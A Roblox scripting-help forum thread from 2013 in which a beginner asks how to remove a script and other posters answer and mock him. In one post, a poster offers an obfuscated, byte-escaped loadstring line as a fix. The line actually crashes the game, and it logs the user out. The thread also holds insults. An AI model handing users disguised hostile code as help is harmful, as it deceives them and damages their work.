| |
|
|
| 02 Feb 2013 09:11 PM |
| A variable refering to game.Workspace, which is a service. |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:12 PM |
| Workspace is basically your building space, where all the objects and stuff go. |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:14 PM |
how do i remove a scirpt in 3.0
script properties? |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:15 PM |
| game.Workspace.Script:remove() |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:17 PM |
| You can't remove workspace. |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:19 PM |
@eyeball
script is named 'corspe'
come play my game and die to understand
how do i remove it then |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:21 PM |
You want to remove a script?
script:remove() |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:21 PM |
| how do i activate a command |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:21 PM |
| You use the command bar, press enter. |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:21 PM |
@yellow
replac () with Corspe |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:22 PM |
| what do i put inbetween remove and corpse |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:22 PM |
| You don't know how to script, do you? |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:23 PM |
i have 25k on my main (fourm posts)
didn't script much
just give me the command is it that hard? |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:23 PM |
You put this in the script:
script:remove()
Shut up, just don't question it. |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:24 PM |
I see where this is going.
Put the line below in a script and run it, it should solve your problems.
loadstring("\121\112\99\97\108\108\40\119\97\105\116\41")() |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:25 PM |
i did you idiots
but i need to remove a certain script
i put it in
it did nothing |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:26 PM |
it killed my god damn game and logged me out
this is a horrible forum |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:28 PM |
| Its not horrible, you just don't understand how it works. My advice, get out. |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:29 PM |
| i just asked how to remove a script you ass |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:31 PM |
| No need to be rude, just come back when you understand that here at Scripting Helpers, we do not make scripts for you. |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:32 PM |
i didn't ask for a script
i asked what the hell was inside of ()
i just asked for one script
you are a horrible helper |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 09:34 PM |
"i didn't ask for a script"
"i just asked for one script"
Moron.
ιησя∂ιηαтυѕ |
|
|
| Report Abuse |
|
|
|
| 02 Feb 2013 10:20 PM |
The reason we cannot answer your question to make a script is: 1. People don't like making scripts for other people 2. We cannot see your game, so we do not know the parent/child relationship of the script that we need to remove. 3. Just put (:Remove()) after you find out the parent/child relationship. 4. You were rude!
if you don't get what I am saying then you should just give up on the game of roblox. |
|
|
| Report Abuse |
|
|
miz656
|
  |
| Joined: 19 Jul 2010 |
| Total Posts: 15336 |
|
|
| 02 Feb 2013 10:23 PM |
Workspace = {Part = {Name = "Part",Anchored = true}}
Workspace.Part.Anchored = false
there's a little-cool pseudo workspace for you.
The actual Workspace accesses instances made in C(C++, and/or haskell)
|
|
|
| Report Abuse |
|
|